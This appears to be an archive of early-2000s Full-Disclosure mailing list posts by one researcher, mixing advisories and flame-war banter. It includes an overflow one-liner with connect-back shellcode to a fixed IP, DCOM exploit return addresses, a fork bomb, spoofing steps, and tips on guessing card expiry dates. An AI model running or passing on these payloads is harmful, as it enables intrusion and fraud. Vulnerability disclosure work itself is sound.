Re: [Full-Disclosure] SRT2003-08-11-0729 - Linux based antivirus software contains several local overflows

2003-08-20 Thread Knud Erik Højgaard
KF wrote:
>> http://www.secnetops.biz/research

snipsnip. 

ugly freebsd version attached. 

--
[EMAIL PROTECTED]

[attachment: DSR-virobot.pl]


Re: [Full-Disclosure] dtors sell out ( phrack#62 )

2003-09-23 Thread Knud Erik Højgaard
morning_wood wrote:
> http://www.phrack.nl/phrack62/p62-0x06.txt
>
> Well, we are here to fully disclose, that indeed b0f did sell dtors
> warez to iDefense. b0f did receive 300 dollars in his paypal account
> ([EMAIL PROTECTED]) on March 4th, 2003.

Even though this text is simply snipped from somewhere else it deserves a
few comments.
b0f is not a part of dtors, nor did he ever sell anything belonging to
dtors.

> anyone want a copy of proof of payment to a dtors member??

A few idefense advisories clearly have my name in it, so I fail to see where
you're going with this. Perhaps you see this as '0day' as well. Why don't
you spend your time in a better way, for example by searching for some more
XSS 'vulnerabilities' or writing some of those .bat files.

> or unreleased exploits ala' Knud Erik Højgaard/kokanin

I'd like a copy of those please, for various reasons.

> ask and ye shall receive

How come the people that have asked you haven't yet received, as you so
elegantly put it?

> LOLOLOLOL

Yes, lololololol 2tm omfg you r0xx0r etc. etc.

> morwodthanyouwilleverhave

I have a whole shed full, thank you, it's plenty for now.

> roots a bitch aint it

No, but silly taglines are.

--
kokanin

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] mIRC "dcc filename spoofing"

2003-04-07 Thread Knud Erik Højgaard
Attached document explains all.

Rant: People using a product called 'antigen' should be shot, stabbed, and
shot again. Today, more than a month after posting DSR-toppler.pl and
sircd.sh, I _still_ get 5-8 emails a day saying that 'a virus have been
found and quarantined'. Oh please, get a grip. And please oh please stop
sending email from invalid addresses, I can't even mail you back and tell
you what I think of your AV solution.

--
Knud Erik Højgaard

I. BACKGROUND

mIRC is "a friendly IRC client that is well equipped with options and 
tools"

More information about the application is available at 
http://www.mirc.com

II. DESCRIPTION

The DCC GET dialog has a limited area visible for the filename.
By DCC sending a file with a specially crafted filename it's possible to 
'spoof' a legitimate file. 

III. ANALYSIS

Sending a file whose name consists of, for example, 'me.mpg' + about 180
"alt-0160" (fake space) characters + '.exe' leads the receiving user into
believing that the file is merely a harmless MPEG file, while it is in fact
an executable. mIRC has a handy 'open' button upon completion of the DCC,
so unless the user actually opens the download folder and verifies the
extension of the file, a compromise is possible.

IIIa. MITIGATING FACTORS

If the remote user has DCC ignore enabled this will of course not work.

IV. DETECTION

mIRC 6.03 and below has been found vulnerable.

V. WORKAROUND

unknown

VI. VENDOR FIX

unknown

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

unknown

IX. CREDIT

Knud Erik Højgaard/kokanin[a]dtors.net
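The padding trick described above, as an added example in C that is not part of the original advisory or of mIRC itself: a receiver-side check that compares the extension a user would see in a width-limited dialog with the extension Windows actually acts on. It assumes the cp1252 encoding (so alt-0160 is byte 0xA0); the sample names, the 8-byte padding threshold and the scratch buffer are illustrative choices, and only the 'about 180' pad length comes from the advisory.

```c
/* Added example (not from the advisory and not mIRC code): receiver-side
 * check for a DCC filename padded so the real extension scrolls out of the
 * visible part of the dialog.  alt-0160 types U+00A0; in the cp1252 encoding
 * assumed here that is byte 0xA0.  Names, the 180-byte pad and the MIN_PAD
 * threshold are illustrative values. */
#include <stdio.h>
#include <string.h>

#define PAD_CHAR 0xA0   /* cp1252 no-break space (alt-0160) */
#define MIN_PAD  8      /* shortest run of blanks treated as deliberate padding */

static char demo_name[512];   /* scratch buffer for the worked example */

/* Bytes that render as blank in a Windows list box. */
static int is_blank_byte(unsigned char c)
{
    return c == ' ' || c == '\t' || c == PAD_CHAR;
}

/* The extension Windows acts on: everything from the last '.' ("" if none). */
const char *true_extension(const char *name)
{
    const char *dot = strrchr(name, '.');
    return dot ? dot : "";
}

/* The extension a user sees when the dialog cuts the name at the first run
 * of blanks: the extension of the first blank-delimited token, copied to out. */
const char *apparent_extension(const char *name, char *out, size_t n)
{
    size_t end = 0, len;
    const char *dot = NULL;
    while (name[end] && !is_blank_byte((unsigned char)name[end])) {
        if (name[end] == '.') dot = name + end;
        end++;
    }
    if (!dot || n == 0) { if (n) out[0] = '\0'; return out; }
    len = (size_t)(name + end - dot);
    if (len >= n) len = n - 1;
    memcpy(out, dot, len);
    out[len] = '\0';
    return out;
}

/* Longest run of consecutive blank bytes anywhere in the name. */
size_t longest_blank_run(const char *name)
{
    size_t best = 0, cur = 0;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++) {
        cur = is_blank_byte(*p) ? cur + 1 : 0;
        if (cur > best) best = cur;
    }
    return best;
}

/* 1 if the shown and the real extension disagree across a padding run
 * (what the dialog displays is not what will execute), else 0. */
int dcc_name_is_spoofed(const char *name)
{
    char shown[32];
    if (longest_blank_run(name) < MIN_PAD) return 0;
    apparent_extension(name, shown, sizeof shown);
    return strcmp(shown, true_extension(name)) != 0;
}

/* Builds the attacker's name from the advisory: shown + pad*0xA0 + real_ext.
 * Returns the length written, 0 if it does not fit. */
size_t build_spoofed_name(char *out, size_t n, const char *shown,
                          size_t pad, const char *real_ext)
{
    size_t a = strlen(shown), b = strlen(real_ext);
    if (a + pad + b + 1 > n) return 0;
    memcpy(out, shown, a);
    memset(out + a, PAD_CHAR, pad);
    memcpy(out + a + pad, real_ext, b + 1);
    return a + pad + b;
}

int main(void)
{
    build_spoofed_name(demo_name, sizeof demo_name, "me.mpg", 180, ".exe");
    printf("real extension %s, flagged=%d\n", true_extension(demo_name),
           dcc_name_is_spoofed(demo_name));
    printf("me.mpg flagged=%d\n", dcc_name_is_spoofed("me.mpg"));
    return 0;
}
```

A DCC receiver would run dcc_name_is_spoofed on the offered name before presenting the 'open' button; the same check also catches plain spaces and tabs used as padding, not only alt-0160.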

[Full-Disclosure] gid bin from /usr/ports/korean/elm (FreeBSD)

2003-06-23 Thread Knud Erik Højgaard
Sorry, no pretty describing document this time.

--
kokanin

[attachment: DSR-korean-elm.pl---txt.poo.av.is.gay]


[Full-Disclosure] Re: gid bin from /usr/ports/korean/elm (FreeBSD)

2003-06-23 Thread Knud Erik Højgaard
Knud Erik Højgaard wrote:
> Sorry, no pretty describing document this time.

Oops, haste makes waste.
The shellcode is by eSDee, not zillion.

--
kokanin



[Full-Disclosure] Re: [Full-Disclosure] iDEFENSE Security Advisory 07.01.03: Caché Insecure Installation File and Directory Permissions

2003-07-01 Thread Knud Erik Højgaard
iDEFENSE Labs wrote:

> iDEFENSE Security Advisory 07.01.03:
> http://www.idefense.com/advisory/07.01.03.txt
> Caché Insecure Installation File and Directory Permissions

Someone might want to add "¤#&%¤% coding" to that, see att.
--
kokanin


[attachment: DSR-crapche.sh]


Re: [Full-Disclosure] how do they do it???

2003-07-10 Thread Knud Erik Højgaard
morning_wood wrote:

>  Replies like this are really not needed, are they???

Yes they are. Besides, please #define like_this.

> MrSecurity Reseacher?

Wow, you read and nearly typed his title in full.

> I suppose I should lament you on your deficiencies,

Why? AFAIK Thor doesn't report XSS crap or other useless shit.

> btw I
> dont have the patch installed either... by choice.

I wish there were more people like you.. oh wait..

> Dont ass-u-me as we all know what that makes you look like.

I believe the construct I know is "don't assume, it makes an ass of u and
me" - is this what you're referring to? The way you say it sounds like you
want to star in a gay pr0n movie. Ulf Tarmhammar did that earlier, please
don't keep it up.

--
kokanin



Re: [Full-Disclosure] The incredible intolerance of Knud

2003-07-10 Thread Knud Erik Højgaard
Thor Larholm wrote:
> We all know that AV vendors are happy to
> treat the symptom instead of fixing the problem, so what?

We all know that the AV-industry is living on loaned time. Soon (hopefully)
people will realise the need for a "safe" (read, no interactivity, just
text) mail client. That would be a nice start. Off we go to the new and
improved "security features" of win2003. What is it that is so
groundbreaking that it is not portable? Oh wait, if it is ported MS would
not be able to sell win2003. I sense a pattern.

--
kokanin



[Full-Disclosure] listproc local root

2003-07-10 Thread Knud Erik Højgaard
someone might have missed this one
http://packetstormsecurity.nl/filedesc/DSR-listproc.pl.html


[Full-Disclosure] lame mirc bugs

2003-07-10 Thread Knud Erik Højgaard
Is this worthwhile? I will be taking a poll on the people getting back to me.

Someone please email [EMAIL PROTECTED], he's so lonely.

--
kokaninATdtors

I. BACKGROUND

mIRC is "a friendly IRC client that is well equipped with options and
tools"

More information about the application is available at
http://www.mirc.com

II. DESCRIPTION

The DCC server built into mIRC listens on port 59 if enabled, and is
insecure by design.

III. ANALYSIS

Connecting to the target on port 59 via, for example, netcat and typing
"100 nick-to-spoof" will show a DCC chat request in the target's client,
appearing to originate from nick-to-spoof.
This can be dangerous if trust relationships are observed between
a vulnerable user and a user on a multi-user system, be it a
shell provider/vhost supplier or the like.

IV. DETECTION

mIRC 6.03 and below (those versions that incorporate the DCC server) are
found to be vulnerable.

V. WORKAROUND

unknown

VI. VENDOR FIX

unknown

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

unknown

IX. CREDIT

Knud Erik Højgaard/kokaninATdtors.net


I. BACKGROUND

mIRC is "a friendly IRC client that is well equipped with options and
tools"

More information about the application is available at
http://www.mirc.com

II. DESCRIPTION

The 'URL handler' allows a user to double-click a URL posted in a channel
or in a query, which is then opened in the default browser.
The 'URL handler' fails to filter/ignore colour codes in links, making
'URL spoofing' possible.

III. ANALYSIS

Messaging users stuff like "Oh my god Saddam just blew up Israel look
for yourself on [EMAIL PROTECTED]/ref.php?refid=spam-user"
will lead the target to believe he's entering cnn.com, while he is in
fact accessing www.paysite.com and giving clicks/cash/whatever to the
'attacker'. Note that the 0 is the colour white, which is the default
background colour in mIRC.

IV. DETECTION

mIRC 6.03 and below (those versions that incorporate colour codes/URL
handling) are found to be vulnerable.

V. WORKAROUND

unknown

VI. VENDOR FIX

unknown

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

unknown

IX. CREDIT

Knud Erik Højgaard/kokaninATdtors.net
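The colour-code trick above, as an added example in C that is not mIRC's code and not part of the original post: a function that strips mIRC formatting bytes from a pasted link, and one that reports the host the browser would actually contact. The advisory's example URL survives here only in redacted form, so the shape used below, 'http://www.cnn.com' followed by the colour code for white-on-white and then '@www.paysite.com/...', is an assumption that follows the post's own explanation (a browser treats everything before '@' in the authority as user-info and ignores it); the hostnames are the advisory's placeholders.

```c
/* Added example (not mIRC code, not from the advisory): strip mIRC
 * formatting codes from a pasted link and report the host the browser will
 * actually contact.  The advisory's URL survives only in redacted form; the
 * shape assumed here is "http://www.cnn.com" + colour code + "@www.paysite.com/...",
 * the user-info trick the text's "colour 0 is white on white" remark
 * describes.  Hostnames are the advisory's placeholders. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define IRC_BOLD      0x02
#define IRC_COLOUR    0x03
#define IRC_RESET     0x0f
#define IRC_REVERSE   0x16
#define IRC_UNDERLINE 0x1f

static char stripped[256], host[128];   /* scratch buffers for the example */

/* Copies in -> out dropping formatting bytes.  A colour code is 0x03, then
 * up to two foreground digits, then optionally ",NN" for the background;
 * those digits belong to the code and are dropped with it.  Returns the
 * number of text bytes (output is truncated to n-1). */
size_t strip_irc_codes(const char *in, char *out, size_t n)
{
    size_t o = 0;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        if (*p == IRC_COLOUR) {
            int fg = 0;
            while (fg < 2 && isdigit(p[1])) { p++; fg++; }
            if (fg && p[1] == ',' && isdigit(p[2])) {
                p += 2;                        /* comma and first bg digit */
                if (isdigit(p[1])) p++;        /* optional second bg digit */
            }
            continue;
        }
        if (*p == IRC_BOLD || *p == IRC_RESET ||
            *p == IRC_REVERSE || *p == IRC_UNDERLINE)
            continue;
        if (o + 1 < n) out[o] = (char)*p;
        o++;
    }
    if (n) out[o < n ? o : n - 1] = '\0';
    return o;
}

/* Host the browser resolves for an http(s) URL that has already been
 * stripped: the part of the authority after the last '@' (user-info is
 * what the victim reads but the browser ignores), without any :port.
 * Returns 1 if user-info was present (the spoofing tell), 0 if not,
 * -1 if the URL is not http(s). */
int url_real_host(const char *url, char *out, size_t n)
{
    const char *p;
    if (!strncmp(url, "http://", 7)) p = url + 7;
    else if (!strncmp(url, "https://", 8)) p = url + 8;
    else return -1;
    size_t auth = strcspn(p, "/?#");
    const char *at = NULL;
    for (size_t i = 0; i < auth; i++) if (p[i] == '@') at = p + i;
    const char *h = at ? at + 1 : p;
    size_t hlen = (size_t)(p + auth - h);
    size_t colon = strcspn(h, ":");
    if (colon < hlen) hlen = colon;
    if (n == 0) return at != NULL;
    if (hlen >= n) hlen = n - 1;
    memcpy(out, h, hlen);
    out[hlen] = '\0';
    return at != NULL;
}

int main(void)
{
    /* Constructed message in the advisory's shape; "\x03" "0,0" is the
     * white-on-white colour code, written as two literals so the hex
     * escape does not swallow the digits. */
    const char *pasted =
        "http://www.cnn.com\x03" "0,0@www.paysite.com/ref.php?refid=spam-user";
    strip_irc_codes(pasted, stripped, sizeof stripped);
    int tell = url_real_host(stripped, host, sizeof host);
    printf("stripped: %s\nreal host: %s%s\n", stripped, host,
           tell == 1 ? "  (user-info present: spoofed display)" : "");
    return 0;
}
```

Stripping the codes before display already defeats the colour trick; the user-info check is the second line of defence, since a "user@host" authority in a link pasted into chat is almost never legitimate.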



Re: [Full-Disclosure] Credit card numbers

2003-07-17 Thread Knud Erik Højgaard
Myers, Marvin wrote:
> Maybe it is only me, but does anyone else notice a big jump in the
> number of merchants that are printing the entire credit card number
> and expiration date on receipts?

In Denmark they  out 4 digits, but sadly the position of them
alternates (jeez).
No expiry date on the receipt, but VISA has limited lifetime, so <50 tries
should do it.

--
kokanin



Re: [Full-Disclosure] Credit card numbers

2003-07-17 Thread Knud Erik Højgaard
Nick Jacobsen wrote:
> Perhaps it is just my imagination here, and I do realize this is an
> unmoderated list, but this seems to be a more than unacceptable email.
> This is a professional list - would you go up to someone at a computer
> security conference and tell em "oh yeah, I used to card during
> highschool all the time"?  My favorite phase is the "I don't exploit
> this *ANYMORE*" (emphasis added)

Bah, I used to shoplift for a living, I don't do it anymore.
I believe god forgives sinners as long as they admit it.
Occasionally I actually break in to other peoples computers.
Boo-fucking-hoo.
This list isn't
corporate-whores-trying-to-gather-enough-strings-to-get-a-clue.

--
kokanin, speaker of truth, friend of jesus, son of God.



[Full-Disclosure] Re: SRT2003-07-16-0358 - bru has buffer overflow and format issues

2003-07-18 Thread Knud Erik Højgaard
KF wrote:
[snip]
>> High Level Description : bru has buffer overflow and format issues
[snip]

contact [EMAIL PROTECTED] for format-edition, free buffer-linux/freebsd
edition attached.

--
kokanin


[attachment: ex_bru.c]


Re: [Full-Disclosure] Odd Behavior - Windows Messenger Service

2003-07-18 Thread Knud Erik Højgaard
Bojan Zdrnja wrote:

> Ok, now take your slackware box, do a default installation on it,
> connect it to the network and then do nmap scan on it from a remote
> box.

hack.dtors.net runs that stuff,
[EMAIL PROTECTED]:~$ netstat -an | grep -i list
tcp        0      0 0.0.0.0:37              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:587             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:79              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:113             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6969            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
unix  2      [ ACC ]     STREAM     LISTENING     75677  /tmp/ssh-qIFD2161/agent.2161
unix  2      [ ACC ]     STREAM     LISTENING     422    /dev/gpmctl
[EMAIL PROTECTED]:~$ cat /etc/*ver*
news.my_news_server.com
Slackware 9.0.0
[EMAIL PROTECTED]:~$

The webserver seems to be gone, but as you can see the login is toor, the
password is left as an exercise to the reader at the moment. Have your way
with it, it's a def. install.

--
kokanin



Re: [Full-Disclosure] Immature blabla / cisco exploit

2003-07-23 Thread Knud Erik Højgaard
Joshua Thomas wrote:

> AFAIK the list is currently unmoderated. I would like to see it
> moderated. This list seems to be more like Jerry Springer than
> anything else at the moment.

May I recommend bugtraq/unsubscribing/a mail client capable of filtering
what you consider unworthy of your gaze/a big cup of something nasty? What
makes full-disclosure interesting is the lack of moderation. People wanting
corporate bullshit can go read about the latest XSS vulnerability in
[EMAIL PROTECTED] and feel like they're in the loop, and at the same
time miss out on the fun/avoid people saying rude stuff.

--
kokakanin



Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #970 - 38 msgs // x-box hacking at ccc

2003-07-24 Thread Knud Erik Højgaard
tcpdumb wrote:

> During the 19. Chaos Communication Congress in Berlin/DE they showed
> up some X-Box "alterations" ;).
>
> www.19c3.de (sorry, german language)

I believe this was the speech,
http://www.ccc.de/congress/2002/fahrplan/event/399.en.html - it was one of
the few talks in English, so a few of us went just because we were able to
understand what was said. It was a pleasant surprise as it proved to be
interesting as well as fairly entertaining. The included URL has media as
well, yippee. A lot better than what was promised regarding hal2001 - last
time I checked 2 crappy realmedia streams and a music video were available.
Bah. Right now it even seems like the site is down, perhaps for good? Who
knows.



Re: Re: [Full-Disclosure] morning_wood should stop posting xss

2003-07-24 Thread Knud Erik Højgaard
Myers, Marvin wrote:
> Jennifer,
>Did you ever think that there is even the slightest possibility
> that the wood has done this on purpose? Have you never heard of a
> honey-pot. Some people in this world do have the ability to learn by
> observing others. So now I guess you are calling all of the honey-pot
> and honey-net operators moron's.

So did GOBBLES, and it seems some people agree.
I for one agree with what "jennifer" said. Thank god we don't all agree, the
world would be so _boring_.

> This is exactly the BS that gets flame wars started. Lighten up a bit
> and look at it from all angles. Maybe a different perspective will
> change your outlook on life. After all if it weren't for morons most
> of us would be collecting unemployment checks.

[repetition of above paragraph. get it?]

--
kokanin



Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-27 Thread Knud Erik Højgaard
Paul Schmehl wrote:
> On Sun, 2003-07-27 at 14:24, Jason wrote:
>>
>> Ok:
>> In short it goes like this.
>>
>> Click Start->Run
>> Type "dcomcnfg.exe"
>> Turn it off
>
> Great!  Now go click all 5000 computers we have to take care of.

Even I, with my limited knowledge, was able to reproduce what seems to have
the same effect using "active registry monitor" and a few minutes of spare
time. However it seems quite a few things use this DCOM stuff, so rolling
out the hotfix via your mass-deployment tool might be the smarter way to go.

--
kokanin



Re: [Full-Disclosure] DCOM RPC exploit failed

2003-07-27 Thread Knud Erik Højgaard
Marcus Graf wrote:

> I compiled dcom.c on linux and tried it against a
> Windows 2000 SP4, german version.
>
> The exploit failed (maybe I need some offset adjustments for the
> german version of Win2k) but after that I noticed some malfunctions:

Yes, you do. Load up winhex, edit ram, attach to svchost.exe(either one will
do), select kernel32.dll(for portability), click ok, click hex search, enter
"FFE4", check "archive blah blah", click ok, click ok, click ok, that thing
showing will be a proper return address.

> - The windows explorer was not able to perform drag'n drop any more.
> When I tried to drag a file somewehere nothing happened.
> - The media player failed. The window came up and closed itself after
> a few seconds.

yeah, a pain in the ass indeed.

> ... don't know what else failed...

outlook express will be unable to open messages, and my mousewheel failed as
well.

> So even when then exploit failed it may seriously disturb the windows
> functionality. A massive scan for vulnerable windows systems on the
> net may become the character of an DoS attack even without any
> successful exploit.

Indeed. What a fine day it will be.

--
kokanin



Re: [Full-Disclosure] Win-Trap captured DCOM-RPC exploit code, on the spot!

2003-07-28 Thread Knud Erik Højgaard
Executable Security wrote:
[snip disgusting commercial]

Why dont you people fuck off and die die die? Spamming the list is one
thing, which should be punished, but spamming my private inbox is worse.
It seems www.phsecurity.com runs some old version of openssl, any takers?

[EMAIL PROTECTED] spam spam [EMAIL PROTECTED] spam spam, off to usenet
we go.

--
kokanin, sick of spamming assholes.



Re: [Full-Disclosure] dcom exploit code observations

2003-07-28 Thread Knud Erik Højgaard
morning_wood wrote:
[snip]
> THIS IS NOT THE CASE...
> this .bat works perfect...

So somehow running the exploit from a .bat file with some shameless
selfpromotion makes svchost _not_ crash upon hitting a wrong return address?

Would you care to elaborate on how you pull that off?

--
kokanin



[Full-Disclosure] listspammer apology

2003-07-29 Thread Knud Erik Højgaard
Hi, there:

Sorry that we have spammed you. We did not intend it to be a SPAM even
though it was a SPAM to you. We apologize for this inconvenience to you. We
will NOT send stuff like that to you and to the list. We must have been
crazy.

Please do accept our apology. (hope this is not a spam to you.)

For PH Security



Re: [Full-Disclosure] listspammer apology

2003-07-29 Thread Knud Erik Højgaard
Knud Erik Højgaard wrote:
> Hi, there:
>
> Sorry that we have spammed you. We did not intend it to be a SPAM even
> though it was a SPAM to you. We apologize for this inconvenience to
> you. We will NOT send stuff like that to you and to the list. We must
> have been crazy.


Oops, I suppose I should have made a point clear.

This is _not_ an apology from _me_!
This is a forward of the personal reply I got for my "FUCK YOU" mails to the
sender.
Again, I, kokanin, am _not_ "ph security", nor would I ever want to be.

--
kokanin



[Full-Disclosure] win2k rpc dcom MAGIC RET'S

2003-07-29 Thread Knud Erik Højgaard
Seeing that some fucking idiot couldn't keep his piehole shut, here goes.

0x0018759F
0x001875E3
0x001F0CD0
0x0018759F
0x001875E3
0x001F0CD0
0x010016C6
0x010016CB
above tested on win2k sp*, dk sp0, nl sp?.

0x001875E3
0x001F0CD0
0x010016C6
0x010016CB
excerpt from above, found to work on above + win2k frog ed. (FREEENCHIIE!!
LEEARNEE TEH ENGLIISH!)

mad greetings: jumper/pivx, esdee/netric

--
kokanin / dtors.net



Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)

2003-07-29 Thread Knud Erik Højgaard
Peter Kruse wrote:

> FYI, Incidents.org reports: "Widespread scans for unpatched Windows
> machines underway (RPC vulnerability). Patch systems and block ports
> 135-139 & 445".
>
> This might be caused by several tools in the hands of kiddies probing
> IP´s for vulnerable systems. This could also be caused by a worm
> making it´s first round crashing and exploiting boxes. I guess time
> will tell.

when it strikes, it won't be silent.

> BTW - nothing here, it´s all quite around my firewalls.

quiets? wait and see.

--
kokasviiijn



Re: [Full-Disclosure] RE: Miatrade Guestbook - Persistant XSS

2003-08-26 Thread Knud Erik Højgaard
[EMAIL PROTECTED] wrote:

>  -
>  Windows security hole
>  -

hahahah funny :) god damn you're not the only one sick of his mindless
babbling.

--
kokanin



[Full-Disclosure] oracle 10g installer race condition

2004-07-04 Thread Knud Erik Højgaard
http://kokanins.homepage.dk/or0rcle.txt

Unbreakable oracle people not informed, this bug is stupid and next to
useless, hence the disclosure. One can only wonder what the coders are
thinking when they chmod 777 stuff.

--
kokanin



Re: [Full-Disclosure] [ElectronicSouls] - SunOS 4.1.x Local Exploit

2002-11-30 Thread Knud Erik Højgaard
[EMAIL PROTECTED] wrote:

> Please do not distribute.
[blah blah snipped]

Am I the only one finding this wording ridiculous when it's posted on a
mailinglist?

--
Angut den stive grønlænder




Re: [Full-Disclosure] Australia becomes a police state [serious]

2002-12-05 Thread Knud Erik Højgaard
Silvio Cesare wrote:
> Hello..
>
> A bill was passed last night in Australia, enabling a "lawful" NSW
> police state (http://www.sydney.indymedia.org).
>
> If i am in a designated "target area", I may be raided
> as I type, the person raiding me need not identify themselves. I may
> be strip searched, my possesions may be seized and disposed..
>
> If i resist, I may be imprisoned for 2 years..

I thought Australia stopped following other people's opinions when they
'abolished' England as the motherland. What the hell is this? Is there some
sort of 'whoever gets most of America's shit on their tongue wins' contest
that I don't know of? Is there a cash prize? 'I love America!'

--
Knud




Re: [Full-Disclosure] Re: [Snort-sigs] kadmind exploit rules

2002-12-10 Thread Knud Erik Højgaard
anakata wrote:
[snip blah blah]
> ^^^ Yes, that DOES apply to YOU.

Well boo hoo.
Who cares about EULA's?
When a EULA says 'you must not reverse engineer or modify this software in
any way', do you obey it?

Information wants to be free. Just like beer.

--
Knud




Re: [Full-Disclosure] R7-0009: Vulnerabilities in SSH2 Implementations from Multiple Vendors

2002-12-16 Thread Knud Erik Højgaard
matt merhar wrote:
> On Mon, 16 Dec 2002 10:56:20 -0800 (PST)
> Michal Zalewski <[EMAIL PROTECTED]> wrote:
>
>> :(){ :|:&};:
>
> ^^ don't type that i lost 134 day uptime because of that

No wonder, if you substitute the : with a word, for example bomb, it's
pretty obvious what this does.

bomb(){ bomb|bomb&};bomb

A properly configured login.conf prohibits this from having any effect on my
FreeBSD, and since you don't state your flavour I suppose it's the same as
mine.

--
Knud




[Full-Disclosure] f-prot antivirus useless buffer overflow

2003-02-06 Thread Knud Erik Højgaard

This advisory may be found at http://kokanins.homepage.dk/
This advisory may not be reproduced, in part or in full, unless this notice
is included.
This advisory was written by knud.


I. BACKGROUND

According to the vendor "F-Prot TM is a quick and easy to use antivirus
software package, specially designed to protect your data from virus
infection and to remove any virus that may have infected your
computersystem."
F-prot is available from www.f-prot.com.

II. DESCRIPTION

Insufficient bounds checking leads to execution of arbitrary code.
Useless exploit at http://kokanins.homepage.dk/f-prot.pl

III. ANALYSIS

Since f-prot is not suid/sgid, overflowing the command line poses no
initial danger unless the admin interferes, and setting +s on strange
binaries must be considered inappropriate at the least.

IV. DETECTION

F-Prot FreeBSD for Small Business [TM] 3.12b, released on Sep. 30th 2002,
the latest available at the time of writing, is known to be vulnerable.

V. WORKAROUND

below

VI. VENDOR FIX

[mail received from vendor]

Dear Knud,
Thank you for your mail.
This has been fixed.
best regards,
Arnar Thor

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

who cares

IX. CREDIT

knud




Re: [Full-Disclosure] [SCSA-005] Proxomitron Naoko Long Path Buffer Overflow/DoS

2003-02-19 Thread Knud Erik Højgaard
Grégory Le Bras | Security Corporation wrote:
> .: Proxomitron Naoko Long Path Buffer Overflow/DoS :.
> 
>
> Security Corporation Security Advisory [SCSA-005]
> 

[snip]

> Sending a parameter with a buffer of 1024 bytes in length or more,
> causes Proxomitron Naoko to crash.
>
> This vulnerability can be easily exploited to execute code.
>
> Exploitation example :
>
> c:\Proxomitron>proxomitron AAA
[snip A's]
> 

Could you perhaps provide a real-world example where this might be used to
gain additional privileges? I fail to see the useful bit in this
vulnerability.

--
Knud




Re: [Full-Disclosure] [SCSA-004] Vulnerability in Microsoft Windows XP

2003-02-19 Thread Knud Erik Højgaard
Grégory Le Bras | Security Corporation wrote:
> .: Vulnerability in Microsoft Windows XP :.
..
> Security Corporation Security Advisory [SCSA-004]
[snip]
>
> A vulnerability was found allowing an user of a restricted session to
> have access to private files belonging to any user of the machine,
> also the administrators.
>
>
> EXPLOIT
> 
>
> The exploit is very simple, it is enough to install a httpd Server
> such as ©Apache. Put them on the disc where Windows Microsoft is
> installed as resources of the server. Connect you to the following
> address: http://localhost/
> The index of the disc thus appears to the screen.
> You can then cross the directory /documents and Setting/ and so to
> reach the private files.

How do you define a 'restricted session'? Would a user in a restricted
environment set up by you be able to install apache, but not be able to
browse the files of other users?

Has the apache by any chance been installed as a service running with SYSTEM
privileges?

--
Knud




[Full-Disclosure] moxftp arbitrary code execution poc/advisory

2003-02-23 Thread Knud Erik Højgaard
Attached document explains all.

This document is also available from http://kokanins.homepage.dk

--
Knud

I. BACKGROUND

According to the vendor moxftp is a "Ftp shell under X Window System".
/usr/ports/ftp/moxftp

II. DESCRIPTION

Insufficient bounds checking leads to execution of arbitrary code. 

III. ANALYSIS

Upon parsing the '220 welcome to server' ftp banner a buffer can be
overrun, allowing us to execute our arbitrary code. The buffer may be 
constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing 
the nops and shellcode in the buffer before ebp seems to cause some 
problems, luckily there's plenty of space after eip.

Example run:

$ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x 100 . "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" . "\n"' > file
# nc -l -p 21 < file

This sets up a rogue server which will overflow the buffer, and execute
the shellcode. The shellcode is connect-back to 217.157.2.36 port 1,
replace "\xd9\x9d\x02\x24" with a suitable ip for testing.

IV. DETECTION

moxftp-2.2 shipping with the FreeBSD ports system as well as from 
various webpages per 9/2-03 is vulnerable.

V. WORKAROUND

unknown

VI. VENDOR FIX

unknown

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

unknown

IX. CREDIT

Knud Erik Højgaard



[Full-Disclosure] sircd proof-of-concept / advisory

2003-02-23 Thread Knud Erik Højgaard
Attached documents explain all.

This is also available from http://kokanins.homepage.dk

[attachment: sircd.sh]
I. BACKGROUND

According to the vendor "The 'sircd' project started as an idea from
the QuakeNet IRC Network coding team to develop a completely new irc
server that had none of the problems of the original ircd, such as
instability, scalability issues, redundant, badly written code and
other nasty things. "
More info is available at http://www.sircd.org.

II. DESCRIPTION

a: Insufficient bounds checking leads to execution of arbitrary code. 
b: Default oper account matching [EMAIL PROTECTED]

III. ANALYSIS

a:
Upon checking the reverse dns of a connecting user, if the returned
value is longer than a certain length a classic stack overflow occurs.

The buffer may be constructed as such:
[94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode],
leaving us with plenty of space both before and after eip to store our
shellcode. 

The accompanying .sh script is a silly proof of concept. 
Below is a fabricated copy of a typical run:

[shell 1]
$ nc -l -v -p 1
listening on [any] 1 ...

[shell 2]
# ./sircd.sh 127.0.0.1

sircd 0.4.0 proof-of-concept, usage ./sircd.sh 

UID check passed, backing up /etc/hosts
Now connect to the sircd from 127.0.0.1
Press a key and enter to restore /etc/hosts
asd
Game over man, game over
#

[shell 3]
$ sircd &
[1] 75711
